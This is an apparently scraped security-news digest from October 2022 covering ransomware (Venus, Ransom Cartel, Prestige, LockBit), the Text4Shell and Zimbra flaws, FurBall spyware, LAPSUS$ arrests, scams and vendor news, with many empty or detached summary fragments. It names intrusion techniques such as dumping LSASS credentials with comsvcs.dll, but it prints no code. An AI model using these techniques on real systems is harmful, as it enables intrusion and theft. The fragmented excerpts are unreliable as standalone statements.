Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @PolarToffee, @Ionut_Ilascu, @FourOctets, @jorntvdw, @struppigel, @BleepinComputer, @demonslay335, @billtoulas, @Seifreed, @LawrenceAbrams, @serghei, @fwosar, @DanielGallagher, @VK_Intel, @malwareforme, @Fortinet, @BroadcomSW, @0verfl0w_, @linuxct, @Unit42_Intel, @Amermelsad, @MsftSecIntel, @CrowdStrike, @GroupIB_GIB, @BushidoToken, @JackRhysider, @Intel471Inc, @NCCGroupplc, and @pcrisk.Cybersecurity researchers did not disappoint, with reports linking RansomCartel to REvil, on OldGremlin hackers targeting Russia with ransomware, a new data exfiltration tool used by BlackByte, a warning that ransomware actors are exploiting VMware vulnerabilities, and finally, our own report on the Venus Ransomware. "Categories: News Categories: Scams Tags: One-Time Federal Student Loan Debt Relief Tags: FBI Tags: student loan relief scam The FBI has warned that scammers are likely to target people looking for student loan relief now that applications have opened. |
The post Looking for student debt relief? Watch out for scammers says the FBI appeared first on Malwarebytes Labs.
"Autosummary:
"Electricity company EnergyAustralia suffered a security breach, threat actors had access to information on 323 customers. Another Australian organization was hit by a severe cyber attack, this time the victim is the Electricity company EnergyAustralia. EnergyAustralia is the country’s third-largest energy retailer. The company confirmed that threat actors had access to information on 323 residential and […]
The post EnergyAustralia Electricity company discloses security breach appeared first on Security Affairs.
"Autosummary:
According to a statement released on Friday, the compromised data were stored on the company’s online platform, My Account, and included customer names, addresses, email addresses, electricity and gas bills, phone numbers, and the first six and last three digits of their credit cards. "Wordfence researchers warn of exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. Experts at WordPress security firm Wordfence reported exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. GitHub’s threat analyst Alvaro Munoz this week disclosed a remote code execution vulnerability, tracked as CVE-2022-42889 (CVSS score 9.8), in the open-source Apache Commons […]
The post Experts warn of CVE-2022-42889 Text4Shell exploit attempts appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "ESET Research spots a new version of Android malware known as FurBall that APT-C-50 is using in its wider Domestic Kitten campaign
The post APT‑C‑50 updates FurBall Android malware – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"More than 9 in 10 financial sectors accept that open banking is vital to their organization. The demand for fast, hassle-free, and personalized banking and financial services among customers is driving the rapid adoption of open banking. However, nearly 50% of banking customers fear the security of open banking. For open banking to function, APIs are critical as they help create connectivity between different stakeholders for the transfer of financial data. Banks and financial institutions … More
The post Open banking API security: Best practices to ensure a safe journey appeared first on Help Net Security.
"Autosummary:
Other API protection best practices Check and track compliance Minimize false positive Don’t forget logging and monitoring The way forward While fuelling innovation and reshaping customer experiences in the banking and financial service industry, open banking APIs also increase security challenges and risks. To this end, you must leverage an intelligent and fully managed API security solution that combines CDN, advanced DDoS prevention, malicious bot mitigation, WAF, malware protection, and so on. "Axio released its 2022 State of Ransomware Preparedness research report, revealing that although notable improvements have been made since Axio’s 2021 report, organizational ransomware preparedness continues to be insufficient to keep pace with new attack vectors. The report reveals that the lack of fundamental cybersecurity practices and controls, including critical vulnerability patching and employee cybersecurity training, continues to undermine organizational attempts to improve ransomware defenses. “Ransomware continues to wreak havoc on global organizations, regardless of … More
The post Ransomware preparedness: What are you doing wrong? appeared first on Help Net Security.
"Autosummary:
"EnigmaSoft Limited is offering SpyHunter Pro, a brand new enhanced, and feature-packed premium anti-malware product that builds on EnigmaSoft’s expertise in cyber security and developing anti-malware products. SpyHunter Pro is a Windows anti-malware application that combines SpyHunter’s effective system guards to help block malware before they cause damage, plus anti-malware detection and removal algorithms, along with new premium features, including functionality purposely designed to enhance privacy protection and optimize computers. SpyHunter Pro also includes, at … More
The post EnigmaSoft SpyHunter Pro combines anti-malware detection and blocking to enhance privacy protection appeared first on Help Net Security.
"Autosummary:
"Sophos has launched new third-party security technology compatibilities with Sophos Managed Detection and Response (MDR) to better detect and remediate attacks across diverse customer and operating environments. The service now integrates telemetry from third-party endpoint, firewall, cloud, identity, email, and other security technologies as part of the Sophos Adaptive Cybersecurity Ecosystem. “The complexity of modern operating environments and the velocity of cyberthreats make it increasingly difficult for most organizations to successfully manage detection and response … More
The post Sophos expands its MDR offering to include compatibility with third-party cybersecurity products appeared first on Help Net Security.
"Autosummary:
Sophos MDR is now compatible with security telemetry from vendors such as Microsoft, CrowdStrike, Palo Alto Networks, Fortinet, Check Point, Rapid7, Amazon Web Services (AWS), Google, Okta, Darktrace, and many others. "Autosummary:
"Autosummary:
Death threats, hacking, and cryptocurrency theft According to the court documents, they allegedly stole $200,000 worth of cryptocurrency in one go from an Arizona resident who "publicly communicated with cryptocurrency experts online," while $100,000 were swiped from a victim in California with close ties to someone who "operated a blockchain-based business. "Autosummary:
The following business transaction data has been exposed: names email addresses email content company name phone numbers In addition, Microsoft warned that the exposed data may include “attached files relating to business between a customer and Microsoft or an authorized Microsoft partner.” "(ISC)² has signed a Memorandum of Understanding (MOU) with the Korea Internet & Security Agency (KISA) to strenghten cybersecurity professional development in emerging economies. The collaboration will leverage the expertise of both organizations to nurture the global cybersecurity workforce in South Korea and Global Cybersecurity Collaboration Network (CAMP) member countries. Through the MOU, both organizations will collaborate to: Expand cybersecurity professional education and training Strengthen professional cybersecurity capabilities, and Reinforce the effectiveness of professional education … More
The post (ISC)² to aid cybersecurity professional development in emerging economies appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Despite this handicap, the Furball malware, in its present form, can retrieve commands from a remote server that allows it to gather contacts, files from external storage, a list of installed apps, basic system metadata, and synced user accounts. "Autosummary:
"Autosummary:
"The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$ extortionist gang. The authorities did not disclose info about the individual, it seems that the […]
The post Brazilian police arrested a man suspected of being a member of LAPSUS$ gang appeared first on Security Affairs.
"Autosummary:
Over the last months, the Lapsus$ gang compromised many high-profile companies such as NVIDIA, Samsung, Ubisoft, Mercado Libre, Vodafone, Microsoft, Okta, and Globant. "Autosummary:
"Autosummary:
The malware executable is wrapped using Ultimate Packer (UPX) and appends the .crypt extension to the encrypted files, among them being .RAW, .ZST, .CSV, .IMG, .ISO, SQL, TAR, TGZ, .DAT, .GZ, .DUMP. "Autosummary:
POST request sent by Ursnif to the C2 server (Mandiant) The commands supported by the LDR4 variant are the following: Load a DLL module into the current process Retrieve the state of the cmd.exe reverse shell Start the cmd.exe reverse shell Stop the cmd.exe reverse shell "Autosummary:
"The group"s victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking," Group-IB said in an exhaustive report shared with The Hacker News. "The threat actors often pose as well-known companies, including the media group RBC, the legal assistance system Consultant Plus, the company 1C-Bitrix, the Russian Union of Industrialists and Entrepreneurs, and Minsk Tractor Works," Group-IB said. "APT-C-50’s Domestic Kitten campaign continues, targeting Iranian citizens with a new version of the FurBall malware masquerading as an Android translation app
The post Domestic Kitten campaign spying on Iranian citizens with new FurBall malware appeared first on WeLiveSecurity
"Autosummary:
If the threat actor expands the app permissions, it would also be capable of exfiltrating: text from clipboard, device location, SMS messages, contacts, call logs, recorded phone calls, text of all notifications from other apps, device accounts, list of files on device, running apps, list of installed apps, and device info.The Furball variant downloaded from the copycat website can still receive commands from its C&C; however, it can only perform these functions: exfiltrate contact list, get accessible files from external storage, list installed apps, obtain basic information about the device, and get device accounts (list of user accounts synced with device).If the threat actor expands the app permissions, it would also be capable of exfiltrating other types of data from affected phones, such as SMS messages, device location, recorded phone calls, and much more. This version of FurBall has the same surveillance functionality as previous versions; however, the threat actors slightly obfuscated class and method names, strings, logs, and server URIs. "Categories: Cybercrime Categories: News Tags: Brasil Tags: Lapsus$ Tags: Telegram Tags: Dark Web Tags: data exfiltration Tags: SIM jacking Tags: arrests A person suspected of being a member of hacking group Lapsus$ has been arrested by Brazilian police |
The post Suspected LAPSUS$ group member arrested in Brazil appeared first on Malwarebytes Labs.
"Autosummary:
LAPSUS$ is also believed to be responsible for invading the systems of Empresa Brasileira de Correios e Telégrafos, and Localiza Rent a Car, as well as several others in South America, the United States and Europe, including Sociedade Independente de Comunicação, a private television channel in Portugal, the group Impresa, Electronic Art, Globant, Nvidia, Okta, Uber, and many others. "Categories: News Tags: Venus Ransomware Tags: RDP Tags: remote desktop services Tags: encrypt Tags: fraud Tags: ransom We take a look at reports of Venus ransomware targeting remote desktop services/RDP. |
The post Venus ransomware targets remote desktop services appeared first on Malwarebytes Labs.
"Autosummary:
For example samples: One from July/August: 2e2cef71bf99594b54e00d459480e1932e0230fb1cbee24700fbc2f5f631bf12 And one from September: 6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05 — MalwareHunterTeam (@malwrhunterteam) October 6, 2022 Venus brings bad remote tidings It seems these attacks very much follow the typical Remote Services/Remote Desktop Protocol (RDP) gameplan. The incredibly overt ransom note, which is somewhat difficult to read given it sports white text on a bright orange background, reads as follows: "We downloaded and encrypted your data. "As a DirectDefense and Halcyon partnership result, DirectDefense will now offer the Halcyon Anti-Ransomware & Endpoint Resilience Platform as part of its Managed Detection and Response (“MDR”) offerings. “Ransomware is on the rise and threat actor groups are becoming increasingly sophisticated. As they evolve, so must your managed security services provider,” said Jim Broome, President, DirectDefense. “The combination of Halcyon’s AI-powered, anti-ransomware engine and our 24/7 MDR security services gives organizations peace of mind that … More
The post DirectDefense collaborates with Halcyon to protect users against ransomware appeared first on Help Net Security.
"Autosummary:
"Recent research from Thales has found that malware, ransomware, and phishing continue to plague global organizations. 21% have experienced a ransomware attack in the last year, with 43% of those experiencing a significant impact on operations. In this Help Net Security video, Todd Moore, Senior VP, Encryption Products at Thales, discusses how the vast majority of consumers worldwide reported a negative impact on their lives following a data breach. Fraudulent use of their financial information … More
The post Fines are not enough! Data breach victims want better security appeared first on Help Net Security.
"Autosummary:
"Sardine announced a new product offering a real-time, comprehensive view of an entity’s risk based on its history transacting with cryptocurrencies, digital assets, and conventional bank products and services. Called Insights, the service aims to bridge data gaps between financial institutions, fintechs, and crypto companies to strengthen risk management and increase access to all segments of financial services. The number of US adults who own crypto assets will surge to 34 million this year. As … More
The post Sardine Insights enable companies to prevent fraud and increase access to financial services appeared first on Help Net Security.
"Autosummary:
“As payments become increasingly real-time, comprehensive risk assessments on any entity conducting a transaction in TradFi or DeFi is critical in keeping bad actors from causing harm especially when settlement is instantaneous, and there is no option for chargebacks,” said Soups Ranjan, CEO of Sardine. "Mandiant released Mandiant Breach Analytics for Google Cloud’s Chronicle. Mandiant Breach Analytics combines Mandiant’s threat intelligence with the power of the Google Cloud Chronicle Security Operations suite to help organizations improve security effectiveness and reduce business risk. Threat actors continue to escalate the sophistication and aggressiveness of their attacks, targeting businesses of all sizes and across all industries. With global median dwell time—defined as the duration between the start of a cyber intrusion and when … More
The post Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments appeared first on Help Net Security.
"Autosummary:
Mandiant Breach Analytics can empower organizations to: Strengthen cyber defense posture : Fueled by the Mandiant Intel Grid, Breach Analytics leverages up-to-the-moment breach intelligence and expertise gleaned from Mandiant’s world-class incident responders, analysts and threat hunters, enabling organizations to put that intelligence into action without timely and costly security engineering. "Popular international fine wine online retailer iDealwine has suffered a data breach during the past weekend, and has yet to reveal the number of customers affected. Its e-shop is still offline, showing a brief explanatory message, and the firm has informed all potentially affected customers about the cyberattack via email (also via the company blog). iDealwine data breach: What happened? iDealwine is an e-merchant based in France, with offices in Hong Kong and London. It … More
The post iDealwine suffers a data breach appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
These plugins, in turn, make it possible to steal cookies from Google Chrome and Mozilla Firefox browsers, capture keystroke and clipboard data, set up virtual desktop sessions, and even remotely connect to the machine over SSH. "Autosummary:
The market varies widely, with policies often determined by insurance providers, but the primary forms of cyber insurance include: Network security systems policies which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs. Cyber insurance, also referred to as cyber liability insurance or data breach insurance, can help mitigate the costs of cyber attacks – an expense that is growing at an alarming rate. "Cybersecurity researchers published technical details about a now-patched FabriXss flaw that impacts Azure Fabric Explorer. Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829 (CVSS 6.2), that impacts Azure Fabric Explorer. An attacker can exploit the vulnerability to gain administrator privileges on the cluster. In order to exploit this flaw, an […]
The post Researchers share of FabriXss bug impacting Azure Fabric Explorer appeared first on Security Affairs.
"Autosummary:
The experts describe a step by step procedure to trigger the flaw along with a screen recording: FabriXss Vulnerability – Orca Research Pod | Orca Security Below is the Timeline for this vulnerability: Orca reported the vulnerability to MSRC via MSRC VDP on August 11, 2022 MSRC reached back and started investigating the issue on August 16, 2022 MSRC worked towards removing the older version on September 1, 2022 Call with MSRC and Orca Team discussing the Vulnerability on September 6, 2022 MSRC assigned CVE-2022-35829 for the vulnerability on October 11, 2022 Fix was included in Microsoft October 2022 Patch Tuesday on October 11, 2022 Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, FabriXSS) "Researchers at Palo Alto Network’s Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Network’s Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious REvil cybercrime gang. The REvil group was one of the most active ransomware gangs in the first half […]
The post The missed link between Ransom Cartel and REvil ransomware gangs appeared first on Security Affairs.
"Autosummary:
“This method of generating session secrets was documented by researchers at Amossys back in 2020; however, their analysis focused on an updated version of Sodinokibi/REvil ransomware, indicating a direct overlap between the REvil source code and the latest Ransom Cartel samples.” continues the report.£Based on the fact that the Ransom Cartel operators clearly have access to the original REvil ransomware source code, yet likely do not possess the obfuscation engine used to encrypt strings and hide API calls, we speculate that the operators of Ransom Cartel had a relationship with the REvil group at one point, before starting their own operation.” "Autosummary:
" Although it"s still unclear how many active members the gang still has, it is believed that Lapsus$ has affiliates worldwide and, based on Telegram chats seemingly suggesting, they speak multiple languages, including English, Russian, Turkish, German, and Portuguese. "Autosummary:
Per SOCRadar"s analysis, these files contain customer emails, SOW documents, product offers, POC (Proof of Concept) works, partner ecosystem details, invoices, project details, customer product price list, POE documents, product orders, signed customer documents, internal comments for customers, sales strategies, and customer asset documents. "Categories: News Tags: scam Tags: fake Tags: fraud Tags: sale Tags: selling Tags: bank transfer Tags: app Tags: phone Tags: mobile Tags: social media We take a look at reports of scammers using fake bank transfer apps to make it look as though they"ve bought your for-sale item. |
The post Man scammed IRL for a phone he sold online appeared first on Malwarebytes Labs.
"Autosummary:
The continued problem of fake payment apps This isn’t the first time this has happened, and law enforcement is definitely taking an interest in these fake app payment scams.And yet… Fake apps, real items Chris Gray of Howdon possesses an IT degree, and considers himself to be tech-savvy.When the money still hadn’t arrived after 20 minutes, Gray did a quick Google and, seeing it could “up to 2 hours” for the transaction to show up, sent the buyer on his way. "Categories: News Categories: Ransomware Stimme Mediengruppe, a German media group, halted production of printed newspapers after a ransomware attack on Friday. |
The post Ransomware attack freezes newspaper printing system appeared first on Malwarebytes Labs.
"Autosummary:
Speaking to BleepingComputer, Uwe Ralf Heer, editor-in-chief of Heilbronn Stimme, said the attack hit the entire Stimme Mediengruppe media group, which Heilbronn is a member. "Categories: News Categories: Ransomware Tags: Dutch Tags: law enforcement Tags: DeadBolt Tags: ransomware Tags: decryption keys Tags: responders.nu With the idea provided by an incident response company, Dutch police used a clever trick to get 150 DeadBolt ransomware decryption keys for free. |
The post DeadBolt ransomware gang tricked into giving victims free decryption keys appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 19, 2022 by With the idea provided by an incident response company, Dutch police used a clever trick to get 150 DeadBolt ransomware decryption keys for free.As a countermeasure, QNAP pushed out an automatic, forced, update with firmware containing the latest security updates to protect against the attackers" DeadBolt ransomware, which annoyed part of its userbase. "Inspira and Trellix partnership extends XDR from Trellix with Inspira’s multivendor tools and broad set of services provided to clients through the company’s Integrated Cyber Threat Management approach, adding prediction and protection to the detection and response capabilities that Trellix’s tool provides. Extended Detection and Response (XDR) is new to the market, with various degrees of XDR solution variants; clients are often confused about where to start. Enterprise clients can invest in multiple solutions and … More
The post Inspira and Trellix join forces to provide integrated approach to cybersecurity appeared first on Help Net Security.
"Autosummary:
"The Strivacity and TransUnion partnership combines Strivacity’s native identity verification capabilities with TransUnion’s TruValidate Global Fraud Solutions. Strivacity customers can now validate the identity of users using TransUnion, which provides a comprehensive view of each consumer by linking proprietary data, personal data, device identifiers, and online behaviors. Identity verification remains a persistent challenge for customer sign-in journeys. Unlike workforce identity management, where the user’s identity is known to the employer, customers’ identities are unknown to … More
The post Strivacity and TransUnion collaborate to help customers with identity verification processes appeared first on Help Net Security.
"Autosummary:
"Researcher discovered a remote code execution vulnerability in the open-source Apache Commons Text library. GitHub’s threat analyst Alvaro Munoz discovered a remote code execution vulnerability, tracked as CVE-2022-42889, in the open-source Apache Commons Text library. Apache Commons Text is a library focused on algorithms working on strings. The vulnerability, dubbed “Text4Shell,” is an unsafe script evaluation issue […]
The post Text4Shell, a remote code execution bug in Apache Commons Text library appeared first on Security Affairs.
"Autosummary:
“These lookups are: – “script” – execute expressions using the JVM script execution engine (javax.script) – “dns” – resolve dns records – “url” – load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used.” wrote the developer in the Apache mailing list. "With hot-ticket events firmly back on the agenda, scammers selling fake tickets online have also come out in force
The post Don’t get scammed when buying tickets online appeared first on WeLiveSecurity
"Autosummary:
In fact, not only could someone just copy the barcode and go to the event with a printout, or a photo on their phone, the only time the victims would realize they have been scammed is when they arrive at the venue and, should they not be the first one in, the ticket won’t work.With hot-ticket events firmly back on the agenda, scammers selling fake tickets online have also come out in force As the events scene slowly came back to life in 2022, the clamor for tickets to festivals and gigs surged massively. "Autosummary:
" Although it"s still unclear how many active members the gang still has, it is believed that Lapsus$ has affiliates worldwide and, based on Telegram chats seemingly suggesting, they speak multiple languages, including English, Russian, Turkish, German, and Portuguese. "Cybercriminals are getting craftier as auto retailers continue to fall victim to well-disguised cyberattacks. According to the second annual dealership cybersecurity study by CDK Global, 15% of dealers have experienced a cybersecurity incident in the past year. Of those impacted, 85% of the occurrences were due to sophisticated phishing attempts concealed as legitimate emails that resulted in data breaches, IT-related business interruptions and loss of revenue. “Consumers are continuously shifting to a more mobile environment, … More
The post For auto dealerships, cybersecurity is more essential than ever appeared first on Help Net Security.
"Autosummary:
Dealers plan to update cybersecurity measures to combat top cyberthreats, such as email phishing, ransomware, lack of employee awareness, theft of business data, PC virus or malware, and stolen or weak passwords. "Autosummary:
"Video messaging company Zoom fixed a high-severity vulnerability, tracked as CVE-2022-28762, in Zoom Client for Meetings for macOS. Zoom Client for Meetings for macOS (Standard and for IT Admin) is affected by a debugging port misconfiguration. The issue, tracked as CVE-2022-28762, received a CVSS severity score of 7.3. When the camera mode rendering context is […]
The post CVE-2022-28762: Zoom for macOS contains a debugging port misconfiguration appeared first on Security Affairs.
"Autosummary:
The company also addressed a medium-severity issue, tracked as CVE-2022-28761 (CVSS score 6.5), that impacts the Zoom On-Premise Meeting Connector Multimedia Router (MMR). "Autosummary:
The threat actor"s campaigns have targeted healthcare, telecoms, high-tech, media, agriculture, and education sectors, with infection chains primarily relying on spear-phishing emails with attachments to initially break into the victims" networks. "Autosummary:
Ransomware is a malware type that encrypts the victim"s files, whether it"s a random user or an organization, leading to denying them access to those files on their personal devices. Starting with taking cybersecurity awareness training courses which we call the ultimate layer of protection, followed by multilayers such as the first and most valuable layer that works on the DNS level, which is the first gate between you and the cybercriminal. SafeDNS has updated categories having DGA, Cryptojacking and others as part of the Security group, and we definitely recommend trying out threat protection & giving a free 15-day trial of web filtering a go. "HelpSystems, the company that developed the Cobalt Strike platform, addressed a critical remote code execution vulnerability in its software. HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed a critical remote code execution vulnerability, tracked as CVE-2022-42948, in its platform. The company released an out-of-band security update to address the remote code […]
The post Critical Remote Code Execution issue impacts popular post-exploitation toolkit Cobalt Strike appeared first on Security Affairs.
"Autosummary:
HelpSystems, the company that developed the commercial post-exploitation toolkit Cobalt Strike, addressed a critical remote code execution vulnerability, tracked as CVE-2022-42948, in its platform. "Autosummary:
Ransom Cartel operations There are also similarities in the tactics, techniques, and procedures (TTPs) used by REvil and Ransom Cartel, such as double-extortion attacks, large ransom demands, and a data leak site to pressure victims into paying a ransom. Finally, the threat actors shut down VMs, terminate all related processes, and encrypt Vmware-related files (.log, .vmdk, .vmem, .vswp and .vmsn). "Autosummary:
"Categories: News Categories: Personal In every scam no matter how sophisticated or how amateur, there are two red flags. |
The post How to spot a scam appeared first on Malwarebytes Labs.
"Autosummary:
On a recent Lock and Code podcast, Cindy Liebes, Chief Cybersecurity Evangelist for the Cybercrime Support Network, spelled out just how patient these scammers can be: "It can take months, it can take years, but invariably they will seek to get money.The virtual ties that bind us are international now: Our public telephone numbers, social media accounts, email addresses, messaging apps, dating profiles, and even our physical mailboxes, can all be reached by any criminal and con artist from anywhere in the world. Though undoubtedly useful, the advice is often specific to a single campaign or type of scam: Watch out for fake DHL emails; Beware of SMS messages from the Royal Mail; Don’t open invoices from unknown senders; Check the spelling and links in emails; Reverse image search too-good-to-be-true dating profile pics, and so on. "Cervello announced a partnership with ST Engineering to incorporate ST Engineering’s cybersecurity services as part of Cervello’s patented rail security solution for rail operators and infrastructure managers. This partnership, which has already proven its value by securing the operations of one of the busiest rail networks in APAC, enhances Cervello’s ability to offer and support its solution globally. “We are pleased to officially announce our already proven strategic cooperation with ST Engineering, a proven technology … More
The post Cervello collaborates with ST Engineering to provide cybersecurity for rail operational networks appeared first on Help Net Security.
"Autosummary:
"Expel has expanded to support the cybersecurity needs of customers in EMEA, and is now operating in the United Kingdom (UK), Ireland, Sweden and the Netherlands. Expel hired cybersecurity industry veteran Chris Waynforth as the general manager and vice president of international business. Waynforth is responsible for growing Expel’s presence in EMEA, supporting customers, and building relationships with EMEA channel partners. “We’re fortunate that Expel’s reputation has preceded us formally entering the market, as we … More
The post Expel extends its reach in EMEA to address critical cybersecurity needs appeared first on Help Net Security.
"Autosummary:
This unmatched transparency means customers always know what’s happening in their investigations into incidents like business email compromise (BEC), business application compromise (BAC), phishing, ransomware, cryptojacking, and supply chain attacks, to name a few. "In this Help Net Security video, Alfredo Hickman, Head of Information Security at Obsidian Security, discusses the importance of security stack consolidation for organizations looking to reduce security costs while increasing security efficiency and effectiveness.
The post Security stack consolidation helps CISOs lower cybersecurity spending appeared first on Help Net Security.
"Autosummary:
"AwareGO launched full Employee Cybersecurity Risk Audit and consultation to help organizations identify critical cybersecurity risks among employees. “Today, around 90% of all successful cybersecurity attacks involve employees enabling the break-in. It is therefore critical for anyone responsible for an organization’s cybersecurity to have a clear picture of what employees know and how they behave in the face of potential threats. Only then is it possible to effectively respond with training or other risk-reducing approaches.” … More
The post AwareGO Employee Cybersecurity Risk Audit identifies weak points associated with human risk appeared first on Help Net Security.
"Autosummary:
"Cybercriminals are always seeking to make their attacks, scams and campaigns as effective as possible. This includes harnessing whatever is dominating the news agenda and is on their victims’ mind. Economic uncertainty and cybersecurity risks The current economic uncertainty and cost of living pressures that many consumers are facing around the world is one example. The stress, fear and concern the public is feeling is unfortunately a perfect scenario for cybercriminals to take advantage. Case … More
The post Economic uncertainty is increasing cybersecurity risks appeared first on Help Net Security.
"Autosummary:
That’s not even factoring in the broader array of IT assets in place, from cloud services and software, to workstations, personal mobile devices, users and more.Businesses must walk the line carefully between removing the bloat and nice-to-haves, and hamstringing their cybersecurity capability, otherwise leaders could find themselves paying much, much more. "Autosummary:
"Autosummary:
Today"s issue in e-paper form Editor-in-chief Uwe Ralf Heer said that the attack impacted the entire Stimme Mediengruppe media group, which includes the companies ‘Pressedruck’, ‘Echo’, and ‘RegioMail.’ "Autosummary:
" Zoetop had been ordered to maintain a comprehensive information security program that includes more robust hashing of customer passwords, network monitoring for suspicious activity, network vulnerability scanning, and incident response policies requiring timely investigation, timely consumer notice, and prompt password resets. "Autosummary:
According to Trend Micro, the ZIP file in the email contains an ISO file, which, in turn, includes a LNK file that fetches the Qakbot payload, illustrating attempts on part of threat actors to adapt to other tactics in the aftermath of Microsoft"s decision to block macros by default for documents downloaded from the web. "Autosummary:
It"s suspected that "Ransom Cartel operators had access to earlier versions of REvil ransomware source code," Palo Alto Networks Unit 42 observed on October 14, stating that "there was a relationship between the groups at some point, though it may not have been recent." REvil, earlier this January, suffered further setback when Russian authorities arrested multiple members, but there are indications that the notorious cybercrime cartel may have staged a return in some form. "The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and facility system equipment. The business of Omiya Kasei is divided into four major areas, manufacturing and designing […]
The post Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Without trying too hard, here I"ve got a ZIP file where the contents retain NO protection from Mark of the Web. pic.twitter.com/1SOuzfca5q — Will Dormann (@wdormann) July 5, 2022 As ACROS Security CEO and co-founder of the 0patch micropatching service Mitja Kolsek explains, MotW is an essential Windows security mechanism since Smart App Control will only work on files with MotW flags and Microsoft Office will only block macros on documents tagged with MotW labels. "Autosummary:
The company first detected unusual activity on its network on Wednesday, October 12, and immediately shut down parts of its systems, including customer-facing services, to reduce the chances of data loss. "Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million MyDeal customers. Bad news for the customers of the MyDeal online marketplace, the Australian retail giant Woolworths disclosed a data breach that impacted approximately 2.2 million of them. As soon the company became aware of the security breach it blocked access to […]
The post Retail giant Woolworths discloses data breach of MyDeal online marketplace appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Considering this tradecraft used to be relegated to APTs like the Russian GRU and APT 41 (China nexus), and considering prior criminal discoveries we"ve made (e.g. Trickbot"s Trickboot module), this represents a bit of a "leap" forward, in terms of ease of use, scalability, accessibility and most importantly, the potential for much more impact in the forms of persistence, evasion and/or destruction. "Autosummary:
"What can schools, which all too often make easy prey for cybercriminals, do to bolster their defenses and keep threats at bay?
The post 5 steps to protect your school from cyberattacks appeared first on WeLiveSecurity
"Autosummary:
Make sure that, over time, your staff understands the importance of not sharing equipment, of keeping passwords private, and of not publishing pictures that might identify sensitive information – and that they can recognize basic features of phishing email.Have a dedicated IT specialist: To understand whether all the devices you listed are working properly or need to be updated, you need an IT person, or an IT team, depending on the size of your school. For schools that went online, new challenges arose over privacy concerns, data leaks, and hacks. "Rockwell Automation released FactoryTalk Design Hub, enabling industrial organizations to transform their automation design capabilities with a more simplified, productive way to work powered by the cloud. Teams of all sizes, skillsets, and locations can work smarter through enhanced collaboration, improved lifecycle management, and on-demand access to cloud-based software. The result is increased design productivity, faster time to market, and systems that cost less to build and maintain. “In this new age of ‘work from … More
The post Rockwell Automation FactoryTalk Design Hub improves development of automation projects appeared first on Help Net Security.
"Autosummary:
“Rockwell Automation’s FactoryTalk Design Hub enables seamless digital thread connectivity between its design, visualization, digital twin, storage, and remote access software tools that provide control system developers with immediate on-demand access to all automation designs as needed regardless of their location, helping these companies to accelerate their initiatives ranging from digital transformation to IT/OT convergence.”, Resnick added. “The digital transformation of automation design capabilities requires both the cloud to maximize control system developers’ productivity, and it also requires that all software tools are connected to each other by a digital thread to maximize collaboration, scalability, and productivity,” according to Craig Resnick, vice president, ARC Advisory Group. "Autosummary:
Still, if the account type is determined to be a business account, the malware will attempt to fetch additional information about payment methods, cycles, amounts spent, owner details, verification status, owned pages, PayPal address, and more. "Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding […]
The post Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug appeared first on Security Affairs.
"Autosummary:
#volexintel 1/4 — Volexity (@Volexity) October 13, 2022 Some webshell paths that @Volexity identified were used in targeted (likely #APT) exploitation of key organizations in government, telecommunications, and IT, predominantly in Asia; others were used in massive worldwide #exploitation. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding CVE-2022-41352 on AttackerKB. "Microsoft warns that new Prestige ransomware is targeting transportation and logistics organizations in Ukraine and Poland. Microsoft reported that new Prestige ransomware is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland. The Prestige ransomware first appeared in the threat landscape on October 11 in attacks occurring within an hour […]
The post Mysterious Prestige ransomware targets organizations in Ukraine and Poland appeared first on Security Affairs.
"Autosummary:
Before deploying ransomware in the target networks, the threat actors were observed using the following two remote execution utilities: RemoteExec – a commercially available tool for agentless remote code execution Impacket WMIexec – an open-source script-based solution for remote code execution Then DEV-0960 used the following tools in some attacks to access to highly privileged credentials: winPEAS – an open-source collection of scripts to perform privilege escalation on Windows comsvcs.dll – used to dump the memory of the LSASS process and steal credentials ntdsutil.exe – used to back up the Active Directory database, likely for later use credentials “In all observed deployments, the attacker had already gained access to highly privileged credentials, like Domain Admin, to facilitate the ransomware deployment.” continues the report. "Autosummary:
